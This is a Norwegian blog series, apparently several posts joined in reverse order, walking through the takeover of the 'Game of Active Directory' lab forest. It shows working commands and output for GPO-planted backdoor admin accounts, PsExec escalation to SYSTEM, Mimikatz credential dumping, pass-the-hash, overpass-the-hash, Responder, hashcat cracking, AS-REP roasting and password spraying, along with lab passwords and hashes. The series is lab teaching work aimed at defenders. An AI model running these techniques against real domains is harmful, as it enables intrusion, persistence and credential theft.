Game of Active Directory del 3.2 – Persistence Privilege escalation & Lateral Movement fortsetter
Forord: Denne bloggserien viser reelle metoder angripere bruker for å bevege seg inn i, og ta over et AD miljø. All denne informasjonen er allerede offentlig tilgjengelig, og deles ikke for å gi grunnkurs i nettkriminalitet, men for å spre kunnskap om hvorfor vi må beskytte oss. Du må kun benytte disse verktøyene, metodene og prosedyrene i miljøer der du har fått eksplisitt samtykke av eier til å gjøre dette.
I forrige post anskaffet vi oss full kontroll over hele North subdomenet i sevenkingdoms.local AD-skogen. I denne posten skal vi ta over hele sevenkingdoms.local med mange av de samme MITRE ATT&CK teknikkene, og noen få nye, bl.a: T1484.001 – Group Policy Modification.
Active Directory Users and Computers
Vi er allerede inne som Backdoor Stark på Winterfell, og kan åpne server manager og kjøre Active Directory Users and Computers (ADUC) som domeneadministrator.
Som standard får vi opp domenet north.sevenkingdoms.local men vi ønsker å se hva vi kan finne i sevenkingdoms.local så vi bytter domenekontekst
Vi bytter kontekst til sevenkingdoms.local for å utforske AD miljøet i hoveddomenet.
Vi blar litt rundt, og noterer oss at kontoen daenerys.targaryen ligger i en OU som heter AcrossTheNarrowSea og tilhører domenet ESSOS. Dette kan kanskje være nyttig i fremtiden, selv om det ikke er helt relevant akkurat nå.
ESSOS\Daenerys.Targaryen eksisterer i sevenkingdoms.local, det er interessant.
Vi bemerker oss at Kingslanding DCen befinner seg i default-first-site-name sammen med Winterfell DCen.
Både Kingslanding og Winterfell befinner seg i default-first-site-name.
Dersom vi kan linke en group policy til default-first-site-name kan vi tvinge kjøring av vilkårlig kode i sevenkingdoms.local og få et solid fotfeste i hele AD-skogen.
Group Policy Management
Vi fyrer opp Group Policy Management og ser litt på group policies. Vi har domeneadmin rettigheter allerede så vi kan opprette egne, men vi finner en policy som heter StarkWallpaper som vi faktisk kunne brukt fra starten av når vi fant Samwell.Tarly sitt passord i rekognoseringsfasen dersom vi hadde ønsket det, ettersom han har mange rettigheter på policyobjektet.
Samwell Tarly og Domain Administrator har full kontroll på GPOen StarkWallpaper.
Vi modifiserer StarkWallpaper til å opprette en planlagt oppgave som skal kjøre så fort policyen treffer en maskin.
GPO -> Edit -> Computer Configuration -> Control Panel Settings -> Scheduled Tasks -> New Immediate Task (At least Windows 7)
Vi kaller den “Open Sesame”, og setter den til å kjøre som NT Authority\System enten bruker er logget inn eller ei, og at den skal kjøre i høyeste privilegienivå.
Under handlinger oppretter vi først en handling som lager en ny bruker ved navn backdoor.baratheon med passordet hail2theking
C:\Windows\System32\net.exe user backdoor.baratheon hail2theking /add
Planlagt oppgave: opprette ny lokal bruker backdoor.baratheon med passord hail2theking
Deretter skal bobby.baratheon legges til i administrators slik at vi får lokale adminrettigheter på maskinen den kjører på.
Planlagte oppgaver: Opprette ny lokal bruker, og melde ny bruker inn i lokaladmin gruppen.
Neste steg er å koble policyen til default-first-site-name og å fremprovosere kjøring i sevenkingdoms.local, men får vi til det?
Vi begynner med å inkludere Default-First-Site-Name i visningen i group policy management under sites.
Vi får sett siten, men vi får ikke lov til å linke policyer som brukeren backdoor.stark.
Link an Existing GPO… er grået ut for NORTH\backdoor.stark på Default-First-Site-Name
Sites and Services
Finnes det kontoer med redigeringsrettigheter? La oss åpne Active Directory Sites and Services for å ta en titt.
Vi ser at Domain Admins og Enterprise Admins i sevenkingdoms.local har rettighetene – men vi har ikke kontroll over noen av disse brukerene enda (se bort fra T.L passordet vi fant tidligere som vi kunne brukt). Men SYSTEM som er en lokal konto har også Write tilgang på Default-First-Site-Name objektet.
SYSTEM har skriverettigheter på Default-First-Site-Name og kan dermed linke GPOer her.
PSExec
Vi laster opp SysInternals verktøyet PSExec64.exe til C:\tmp på Winterfell, og åpner et powershell-vindu med adminrettigheter for å starte psexec som admin.
PS C:\tmp> .\PsExec64.exePsExec v2.43- Execute processes remotelyCopyright (C)2001-2023 Mark RussinovichSysinternals -www.sysinternals.comPsExec executes a program on a remote system,where remotely executed consoleapplications execute interactively.Usage: psexec [\\computer[,computer2[,...]|@file]][-uuser[-ppsswd]][-ns][-rservicename][-h][-l][-s|-e][-x][-i[session]][-c[-f|-v]][-wdirectory][-d][-<priority>][-gn][-an,n,...][-verbose] cmd [arguments]-a Separate processors on which the application can run with commas where1 is the lowest numbered CPU. For example, to run the application on CPU 2 and CPU 4, enter:"-a 2,4"-c Copy the specified program to the remote system for execution. If you omit this option the application must be in the system path on the remote system.-d Don't wait for process to terminate (non-interactive). -e Does not load the specified account's profile.-f Copy the specified program even if the file already exists on the remote system.-g Set the primary thread's processor group to the one specified (Only for systems with more than 64 processors). -i Run the program so that it interacts with the desktop of the specified session on the remote system. If no session is specified the process runs in the console session. -h If the target system is Vista or higher, has the process run with the account's elevated token,if available.-l Run process as limited user (strips the Administrators group and allows only privileges assigned to the Users group). On Windows Vista the process runs with Low Integrity.-n Specifies timeout in seconds connecting to remote computers.-p Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password.-r Specifies the name of the remote service to create or interact. with.-s Run the remote processin the System account.-u Specifies optional user name for login to remote computer.-v Copy the specified file only if it has a higher version number or is newer on than the one on the remote system.-w Set the working directory of the process(relative to remote computer).-x Display the UI on the Winlogon secure desktop (local system only).-arm Specifies the remote computer is of ARM architecture.-priority Specifies -low,-belownormal,-abovenormal,-high or-realtime to run the process at a different priority. Use-background to run at low memory and I/O priority on Vista. computer Direct PsExec to run the application on the remote computer or computers specified. If you omit the computer name PsExec runs the application on the local system, and if you specify a wildcard (\\*), PsExec runs the command on all computers in the current domain.@file PsExec will execute the command on each of the computers listedin the file. cmd Name of application to execute. arguments Arguments to pass (note that file paths must be absolute paths on the target system).-accepteula This flag suppresses the display of the license dialog.-nobanner Do not display the startup banner and copyright message.
Vi kjører psexec med flaggene -s for å kjøre som System, -i for å kjøre console og -d så ikke den trenger å vente på at sesjonen tar slutt, og ber den starte cmd.exe
PS C:\tmp> .\PsExec64.exe-s -i -d cmd.exePsExec v2.43- Execute processes remotelyCopyright (C)2001-2023 Mark RussinovichSysinternals -www.sysinternals.comcmd.exe started on WINTERFELL with process ID 2648.
Nå har vi et cmd.exe shell kjørende som nt authority\system på Winterfell DC-en. La oss kjøre en ny instans av Server Manager i denne konteksten, åpne group policy manager og sjekke om vi kan linke GPOer til Default-First-Site-Name nå.
Vi ser at “Link an existing GPO…” er klikkbar nå som vi kjører Group Policy Manager som NT Authority\System
Det får vi lov til, og vi linker StarkWallpaper GPOen her. Med det gjort ønsker vi nå å endre på security filtering, slik at den treffer domenekontrolleren Kingslanding i sevenkingdoms.local
Security Filtering: scopet mot KINGSLANDING$ i sevenkingdoms.local istedenfor Authenticated Users i north.sevenkingdoms.local
Verifisering
Vi scanner kjapt med NetExec for å se om vi får tilgang over RDP med backdoor.baratheon og passord hail2theking, og kan bekrefte at den har kjørt på både Winterfell og på Kingslanding, og at vi nå eier domenekontrolleren i sevenkingdoms.local
$netexecrdp10.3.2.10-30-ubackdoor.baratheon-phail2thekingRDP10.3.2.113389WINTERFELL [*] Windows 10 or Windows Server 2016 Build 17763 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(nla:True)RDP10.3.2.103389KINGSLANDING [*] Windows 10 or Windows Server 2016 Build 17763 (name:KINGSLANDING)(domain:sevenkingdoms.local)(nla:True)RDP10.3.2.223389CASTELBLACK [*] Windows 10 or Windows Server 2016 Build 17763 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(nla:True)RDP10.3.2.123389MEEREEN [*] Windows 10 or Windows Server 2016 Build 14393 (name:MEEREEN)(domain:essos.local)(nla:True)RDP10.3.2.233389BRAAVOS [*] Windows 10 or Windows Server 2016 Build 14393 (name:BRAAVOS)(domain:essos.local)(nla:True)RDP10.3.2.113389WINTERFELL [+] north.sevenkingdoms.local\backdoor.baratheon:hail2theking (Pwn3d!)RDP10.3.2.103389KINGSLANDING [+] sevenkingdoms.local\backdoor.baratheon:hail2theking (Pwn3d!)RDP10.3.2.223389CASTELBLACK [+] north.sevenkingdoms.local\backdoor.baratheon:hail2theking RDP10.3.2.123389MEEREEN [-] essos.local\backdoor.baratheon:hail2theking (STATUS_LOGON_FAILURE)RDP10.3.2.233389BRAAVOS [-] essos.local\backdoor.baratheon:hail2theking (encoded_datamustbeabytestring,notNoneType)Runningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Vi lykkes med å logge på kingslanding DCen i sevenkingdoms.local som backdoor.baratheon og vi har full admintilgang – også i domenet.
Vi kan f.eks elevere oss selv til Enterprise Admin i skogen via ADUC
Vi legger oss selv til som Enterprise Admin
Herfra kan vi se om det er noen spennende måter å få fotfeste i Essos.local domenet, som er det vi skal ta for oss i neste innlegg.
Refleksjon
Som vi så var det en smal sak å forflytte seg fra et underdomene til et overordnet domene når man allerede hadde kontroll over en domenekontroller, og kontrollerene i begge strukturene delte samme site. Dette er en sårbar standardkonfigurasjon i Active Directory veldig mange ikke er klar over, og kan utnyttes for å bryte hele skogen når man først har fått et solid feste i ett av domenene.
Vi har funnet andre indikatorer på at ting ikke er som de skal, vi kunne enumerere objekter i sevenkingdoms.local via robb.stark i north.sevenkingdoms.local, og vi fant et passordhint for en konto “T.L” som ikke befinner seg i north.
Det er også mange flere sårbarheter men jeg ønsker ikke å kartlegge absolutt alle i denne serien, det er kun ment for å vise hvordan jeg valgte å løse det, slik at andre kan se hvor alvorlige konsekvensene kan være dersom man har slike svakheter i Active Directory miljøene sine.
Jeg føler ikke noe enormt tidspress med å gi ut råd om hvordan man tetter disse hullene ettersom alle verktøyene og teknikkene har vært ute i mange år allerede, og jeg tror det er i hovedsak administratorer som bør eksponeres for lavterskel-angrep som detet for å få øynene opp for hvor viktig det er å ta en ordentlig gjennomgang av identitetsmiljøet sitt.
Det er nemmelig slik i 2025 at trusselaktørene foretrekker å logge seg inn, ikke bryte seg inn.
Game of Active Directory del 3.1 – Persistence Privilege escalation & Lateral Movement
Forord: Denne bloggserien viser reelle metoder angripere bruker for å bevege seg inn i, og ta over et AD miljø. All denne informasjonen er allerede offentlig tilgjengelig, og deles ikke for å gi grunnkurs i nettkriminalitet, men for å spre kunnskap om hvorfor vi må beskytte oss. Du må kun benytte disse verktøyene, metodene og prosedyrene i miljøer der du har fått eksplisitt samtykke av eier til å gjøre dette.
Selv om vi allerede har eierskap over Robb Stark kontoen som er administrator på Winterfell og på Castelblack skal vi begynne på Castelblack med Jeor Mormont sin konto for å demonstrere hvordan man kan gå fra lokal administrator på en maskin, til å bli domeneadministrator i et domene.
Fotfeste
Vi begynner med å logge på som NORTH\jeor.mormont via Evil-WINRM:
Vi ser oss litt rundt på systemet når vi først har admintilgang, og vi finner en interessant mappe på C:\ som heter setup. Denne inneholder en mappe som heter mssql. I den mappen finner vi en fil ved navn sql_conf.ini som inneholder veldig spennende opplysninger.
MSSQL credentials er ofte gjenbrukt på flere tjenester. Vi tester å password spraye serverparken med konto sql_svc og passordet vi avdekket i config fila, og ser det funker på både CASTELBLACK og BRAAVOS, og de befinner seg henholdsvis i north.sevenkingdoms.local og i essos.local – vi har med andre ord gyldige MSSQL credentials i to domener.
$netexecmssql10.3.2.10-30-usql_svc-p"YouWillNotKerboroast1ngMeeeeee"MSSQL10.3.2.221433CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)MSSQL10.3.2.231433BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS)(domain:essos.local)MSSQL10.3.2.221433CASTELBLACK [+] north.sevenkingdoms.local\sql_svc:YouWillNotKerboroast1ngMeeeeee (Pwn3d!)MSSQL10.3.2.231433BRAAVOS [+] essos.local\sql_svc:YouWillNotKerboroast1ngMeeeeee (Pwn3d!)
XFREERDP3
Vi kobler på Castelblack serveren via RDP med verktøyet XFREERDP3, med brukeren jeor.mormont og passordet vi fant i scriptet på fileshare tidligere.
$xfreerdp3/u:jeor.mormont/p:_L0ngCl@w_/v:castelblack.north.sevenkingdoms.localCertificatedetailsforcastelblack.north.sevenkingdoms.local:3389 (RDP-Server):CommonName:castelblack.north.sevenkingdoms.localSubject:CN=castelblack.north.sevenkingdoms.localIssuer:CN=castelblack.north.sevenkingdoms.localValidfrom:Sep914:23:572025GMTValidto:Mar1114:23:572026GMTThumbprint:f1:8c:88:75:0d:a2:29:40:50:b3:71:30:dd:75:69:25:ee:f7:fc:6b:19:47:a7:90:c8:27:d0:66:f9:f1:69:a5TheaboveX.509certificatecouldnotbeverified,possiblybecauseyoudonothavetheCAcertificateinyourcertificatestore,orthecertificatehasexpired.PleaselookattheOpenSSLdocumentationonhowtoaddaprivateCAtothestore.Doyoutrusttheabovecertificate? (Y/T/N) y
Vi ser vi er inne på castelblack serveren som jeor.mormont via remote desktop protocol.
..og vi er inne, som jeor,mormont på castelblack via RDP.
Aktive sesjoner
Vi sjekker Task Manager for å se om det er noen interessante sesjoner vi kan prøve å dumpe ut, og her ser vi at robb.stark også er på maskinen. Vi har allerede stjelt og cracket hashen hans i forrige artikkel, men vi ønsker å se på enda en måte å få tak i denne kontoen på.
Det er to åpne brukersesjoner på maskinen: robb.stark, og jeor.mormont (oss).
Windows Defender
Som vi kan se er Defender real-time-protection allerede skrudd av på denne maskinen, men for å være helt sikre oppretter vi også en ekskludert mappe for verktøy vi ønsker å benytte.
C:\tmp\ er ekskludert fra Windows Defender, og real-time-scanning er avslått.
Verktøy
Det neste vi gjør er å laste opp noen verktøy vi skal bruke til å dumpe NTLM hasher, bl.a for Robb Stark brukeren ut av LSASS. Vi bruker like gjerne WinRM til å laste opp en kolleksjon med verktøy vi har som ligger i en mappe som heter wintools.
Med en lokal administratorkonto, defender deaktivert og verktøykasse på plass kan vi gå i gang med å fyre opp Mimikatz, og å dumpe ut hasher fra minnet.
PS C:\tmp\wintools\mimikatz> .\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )## \ / ## > https://blog.gentilkiwi.com/mimikatz'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com)'#####'> https://pingcastle.com/ https://mysmartlogon.com***/
i outputfilen katz.txt finner vi mye spennende – forkortet for å ikke bruke plass på unødvendig innhold.
Vi ser vi har plukket opp passordet til maskinkontoen CASTELBLACK$ i klartekst, og vi har også plukket opp NTLM hasher for jeor.mormont, robb.stark og sql_svc kontoene.
Pass-the-Hash
Vi hadde allerede passordene til alle tre kontoene, men dersom vi ikke hadde funnet dem via andre teknikker ville vi hatt disse NTLM hashene nå, og vi kan forsøke å knekke passord med HashCat, eller vi kan spare oss bryet og logge rett på tjenester med NTLM hashen uten å kunne passordet, i såkalte “pass-the-hash” angrep.
$xfreerdp3/u:robb.stark/pth:831486ac7f26860c9e2f51ac91e1a07a/v:winterfell.north.sevenkingdoms.localCertificatedetailsforwinterfell.north.sevenkingdoms.local:3389 (RDP-Server):CommonName:winterfell.north.sevenkingdoms.localSubject:CN=winterfell.north.sevenkingdoms.localIssuer:CN=winterfell.north.sevenkingdoms.localValidfrom:Sep914:10:312025GMTValidto:Mar1114:10:312026GMTThumbprint:7f:71:a3:d6:99:86:d5:5b:48:ca:0b:42:80:00:78:bf:74:46:54:80:72:ae:e0:2c:43:8f:5a:40:52:65:41:39TheaboveX.509certificatecouldnotbeverified,possiblybecauseyoudonothavetheCAcertificateinyourcertificatestore,orthecertificatehasexpired.PleaselookattheOpenSSLdocumentationonhowtoaddaprivateCAtothestore.Doyoutrusttheabovecertificate? (Y/T/N) y
Vi forsøker å logge på winterfell.north.sevenkingdoms.local som er domenekontroller i north subdomenet i ad-skogen sevenkingdoms.local.
“Account restrictions are preventing this user from signing in, For example: blank passwords aren’t allowed, sign-in times are limited, or a policy restriction has been enforced.”
Vi blir dessverre møtt med en beskjed om at dette ikke er tillatt grunnet kontorestriksjoner. Dette skyldes en innstilling som er satt noen steder og ikke andre.
NetExec med kontonavn og hash:
Prøver vi derimot å benytte hashen til robb.stark for smb enumerering ser vi at det funker helt fint, da dette ikke berøres av samme innstillingene.
$netexecsmb10.3.2.10-30-urobb.stark-H831486ac7f26860c9e2f51ac91e1a07aSMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\robb.stark:831486ac7f26860c9e2f51ac91e1a07a (Pwn3d!)SMB10.3.2.10445KINGSLANDING [-] sevenkingdoms.local\robb.stark:831486ac7f26860c9e2f51ac91e1a07a STATUS_LOGON_FAILURESMB10.3.2.12445MEEREEN [-] essos.local\robb.stark:831486ac7f26860c9e2f51ac91e1a07a STATUS_LOGON_FAILURESMB10.3.2.23445BRAAVOS [+] essos.local\robb.stark:831486ac7f26860c9e2f51ac91e1a07a (Guest)SMB10.3.2.22445CASTELBLACK [+] north.sevenkingdoms.local\robb.stark:831486ac7f26860c9e2f51ac91e1a07aRunningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Overpass-the-hash
Vi benytter en teknikk som heter overpass-the-hash ved hjelp av mimikatz. På denne måten kan vi “oppgradere” til Kerberos autentisering som Robb.Stark på Castelblack serveren. Dette lar oss også snakke med domenet som om vi er Robb Stark.
mimikatz # privilege::debugPrivilege '20' OKmimikatz # sekurlsa::pth /user:robb.stark /domain:north.sevenkingdoms.local /ntlm:831486ac7f26860c9e2f51ac91e1a07auser : robb.starkdomain : north.sevenkingdoms.localprogram : cmd.exeimpers. : noNTLM : 831486ac7f26860c9e2f51ac91e1a07a| PID 1604| TID 4260| LSA Process is now R/W| LUID 0;2426481(00000000:00250671) \_ msv1_0 -data copy @ 00000225E0CBDBA0 : OK ! \_ kerberos -data copy @ 00000225E1279618 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_*Password replace @ 00000225E11D20C8 (32)-> null
Det åpnes et nytt cmd.exe vindu. Sjekker vi hvem vi er via /whoami ser vi at systemet mener vi er jeor.mormont enda.
Microsoft Windows [Version10.0.17763.7792](c)2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoaminorth\jeor.mormont
Sjekker vi om vi har fått noen Kerberos tickets via KLIST ser vi at det ser jo heller dårlig ut.
C:\Windows\system32>klistCurrent LogonId is 0:0x375a10Cached Tickets: (0)
Men prøver vi å enumerere innholdet på C disken på Winterfell DCen så ser vi at det fungerer faktisk helt fint.
C:\Windows\system32>dir \\winterfell.north.sevenkingdoms.local\C$ Volume in drive \\winterfell.north.sevenkingdoms.local\C$ is Windows 2019 Volume Serial Number is 9458-49FB Directory of \\winterfell.north.sevenkingdoms.local\C$09/12/202505:43 AM 5,280 dns_log.txt09/10/202504:27 AM <DIR> inetpub05/11/202109:55 PM <DIR> PerfLogs09/09/202511:23 AM <DIR> Program Files05/11/202109:41 PM <DIR> Program Files (x86)09/11/202512:04 PM <DIR> setup09/10/202504:26 AM <DIR> tmp09/30/202510:56 AM <DIR> Users09/30/202510:31 AM <DIR> Windows1 File(s)5,280 bytes8 Dir(s)38,864,101,376 bytes free
Sjekker vi KLIST igjen ser vi at nå har vi fått en kerberos ticket-granting-ticket for robb.stark, og at vi også har hentet oss en Kerberos Service Ticket for robb som er gyldig mot fileshares på winterfell.
En mye brukt teknikk for å komme inn i et system er å opprette en egen bruker på målsystemet som vi bestemmer passordet på selv. I dette tilfellet ønsker vi å bruke PowerSploit, selv om det er mange måter å gjøre dette på, som med alle andre teknikker og verktøy denne serien demonstrerer.
Vi begynner med å laste inn powershell.exe og modulen PowerSploit fra verktøykassa. Deretter oppretter vi en SecureString med passordet vårt som i dette tilfellet er WinterIsComing. Så oppretter vi en ny bruker vi kaller Backdoor.Stark med dette passordet.
Backdoor Stark har kommet inn på Winterfell via RDP.
Refleksjon
Vi har altså tatt over hele North subdomenet i Sevenkingdoms.local skogen, med enkle metoder og verktøy som har vært offentlig tilgjengelige i lange tider – i noen tilfeller flere tiår – som likevel kan være ekstremt enkle og effektive i bruk mot selv maskiner som kjører Windows Server 2016 og Windows Server 2019!
Noen av svakhetene skyldes svake standardkonfigurasjoner som Microsoft lar stå for å sikre bakoverkompatibilitet med systemer fra 80- og 90-tallet rett ut av boksen. Andre ting skyldes dårlige administrative praksiser som svekker sikkerheten ytterligere.
I neste innlegg skal vi se hvordan vi kan ta oss fra eierskap i North subdomenet til eierskap over hele sevenkingdoms.local skogen ved å misbruke flere svake konfigurasjoner.
Forord: Denne bloggserien viser reelle metoder angripere bruker for å bevege seg inn i, og ta over et AD miljø. All denne informasjonen er allerede offentlig tilgjengelig, og deles ikke for å gi grunnkurs i nettkriminalitet, men for å spre kunnskap om hvorfor vi må beskytte oss. Du må kun benytte disse verktøyene, metodene og prosedyrene i miljøer der du har fått eksplisitt samtykke av eier til å gjøre dette.
I dette segmentet tar vi for oss “initial access” på systemer. Vi fokuserer på MITRE ATT&CK T1078.002 – Valid Accounts: Domain Accounts. Selv om vi allerede har passordet til Sam og hint om Arya, så skal vi utforske flere metoder i denne posten.
Responder
Dersom miljøet benytter NTLM-autentisering kan vi forsøke å stjele NTLM hasher fra nettverket. Disse kan man enten cracke offline for å finne kontopassordet. I mange tilfeller kan vi også utnytte en klassisk sårbarhet, og utføre såkalte relay-angrep der vi videresender hashen til en tjeneste uten å kunne passordet, og likevel kan vi bli autentisert som den kontoen mot en tjeneste.
Ettersom vi befinner oss på samme L2 broadcast domain som labben, kan vi kjøre et verktøy som heter Responder for å se om vi kan finne noen hasher.
$sudoresponder-Ivxlan100--analyze[+] Listening for events...[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned
Forsøker vi å cracke disse to oppfangede hashene med rockyou ordlista, ser vi at dette ikke lykkes for eddard.stark kontoen.
$hashcat-m5600creds/eddard.stark.north.sevenkingdoms.local.ntlmv2/usr/share/wordlists/rockyou.txthashcat (v6.2.6) startingOpenCLAPI (OpenCL 3.0PoCL6.0+debianLinux,None+Asserts,RELOC,SPIR-V,LLVM18.1.8,SLEEF,DISTRO,POCL_DEBUG) - Platform #1 [The pocl project]====================================================================================================================================================Minimumpasswordlengthsupportedbykernel:0Maximumpasswordlengthsupportedbykernel:256Hashes:1digests;1uniquedigests,1uniquesaltsBitmaps:16bits,65536entries,0x0000ffffmask,262144bytes,5/13rotatesRules:1Optimizersapplied:* Zero-Byte* Not-Iterated* Single-Hash* Single-SaltATTENTION!Pure (unoptimized) backend kernels selected.Purekernelscancracklongerpasswords,butdrasticallyreduceperformance.Ifyouwanttoswitchtooptimizedkernels,append-Otoyourcommandline.Seetheabovemessagetofindoutabouttheexactlimits.Watchdog:Temperatureaborttriggersetto90cHostmemoryrequiredforthisattack:1MBDictionarycachehit:* Filename..: /usr/share/wordlists/rockyou.txt* Passwords.: 14344385* Bytes.....: 139921507* Keyspace..: 14344385Crackingperformancelowerthanexpected?* Append -O to the commandline.Thislowersthemaximumsupportedpassword/saltlength (usually downto32).* Append -w 3 to the commandline.Thiscancauseyourscreentolag.* Append -S to the commandline.Thishasadrasticspeedimpactbutcanbebetterforspecificattacks.Typicalscenariosareasmallwordlistbutalargeruleset.* Update your backend API runtime / driver the right way:https://hashcat.net/faq/wrongdriver* Create more work items to make use of your parallelization power:https://hashcat.net/faq/moreworkApproachingfinalkeyspace-workloadadjusted.Session..........:hashcatStatus...........:ExhaustedHash.Mode........:5600 (NetNTLMv2)Hash.Target......:EDDARD.STARK::NORTH:1122334455667788:4162288f6fae16...000000Time.Started.....:MonSep2214:06:272025 (12 secs)Time.Estimated...:MonSep2214:06:392025 (0 secs)Kernel.Feature...:PureKernelGuess.Base.......:File (/usr/share/wordlists/rockyou.txt)Guess.Queue......:1/1 (100.00%)Speed.#1.........:916.2kH/s (1.82ms) @ Accel:512 Loops:1 Thr:1 Vec:8Recovered........:0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)Progress.........:14344385/14344385 (100.00%)Rejected.........:0/14344385 (0.00%)Restore.Point....:14344385/14344385 (100.00%)Restore.Sub.#1...:Salt:0Amplifier:0-1Iteration:0-1Candidate.Engine.:DeviceGeneratorCandidates.#1....:$HEX[206b72697374656e616e6e65] ->$HEX[042a0337c2a156616d6f732103]Hardware.Mon.#1..:Util:67%Started:MonSep2214:06:262025Stopped:MonSep2214:06:412025
Prøver vi derimot med robb.stark ser vi at vi finner passordet meget raskt. For å korte ned litt tar jeg ikke med alt av output fra hashcat, men vi ser på slutten her at passordet til robb.stark er “sexywolfy”.
Vi har allerede den tilgangen vi trenger, egentlig, men vi ønsker også å se på andre sårbarheter.
AS-Rep Roasting
Et eksempel kan være å sjekke om vi kan AS-REP roaste brukerkontoer i lista vi fikk fra enum4linux i recon fasen.
AS-REP eller “Authentication Server Response” kan utnyttes dersom en konto er flagget “UF_DONT_REQUIRE_PREAUTH”.
Hvem som helst med nettverkstilgang vil kunne be om en såkalt “Ticket Granting Ticket” (TGT) fra Kerberos Key Distribution Center (KDC). Denne billetten (TGT) kan man bruke til å skaffe tjenestebilletter for å logge seg på gitte tjenester, som f.eks fileshares, remote desktop, el.l – men er kryptert med kontoens passord. Dermed kan vi forsøke å cracke passordet med et ordliste angrep, mot en kryptert TGT.
└─$GetNPUsers.py-usersfilecreds/userlist.north.sevenkingdoms.local-request-formathashcat-outputfilecreds/north.asrep-dc-ip10.3.2.11'NORTH/'[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)[-] User SEVENKINGDOMS$ doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set$krb5asrep$23$brandon.stark@NORTH:973db4ba589726bc964c68c804b487ce$d84f141daf8038225860954b00aee0578224ba0f052d99f0e575b0197f375f577d801bd6bb4784aa2d1d14693e8c7feb52331d1f97ce47cbd81f3114bcd88153e5fc492a6b9a42643043cae5cb79387b6d7f788d58fce52495b72c48c537668e8cb2d35c96117fb49f34ced19a3a39ff5552d9d0ef1ba74f8d022fe47b524b76b49da7e354a36588efa4e594fb0343a231c1702acd088c351280174df0963386635d2f43a8a249db4070e778185e08e73032856d523f68f2bf0028db72199fd145544ad180d3095126332b2d63acee31c6ce395be66ea84159371229c92f9f425e0bf5a126974d86d2c06919475f69965297[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
Vi har altså klart å AS-REP roaste brukeren til NORTH\Brandon.Stark, noe som innebærer at vi har fått tak i en kerberos ticket kryptert med hans passord. Det betyr at vi kan forsøke å cracke passordet til denne kontoen.
Password spraying
Videre kan vi forsøke å gjette passord mot kontoer. Det er ikke helt uvanlig at brukernavn = passord, som f.eks i admin/admin standardpålogginger og lignende.
─$forpin$(cat creds/userlist.north.sevenkingdoms.local);donetexecsmb10.3.2.0/24-u$p-p$p;doneRunningnxcagainst256targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.12445MEEREEN [-] essos.local\hodor:hodor STATUS_LOGON_FAILURESMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMB>SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False>SMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)>SMB10.3.2.23445BRAAVOS [+] essos.local\hodor:hodor (Guest)SMB10.3.2.10445KINGSLANDING [-] sevenkingdoms.local\hodor:hodor STATUS_LOGON_FAILURESMB10.3.2.22445CASTELBLACK [+] north.sevenkingdoms.local\hodor:hodorSMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\hodor:hodor
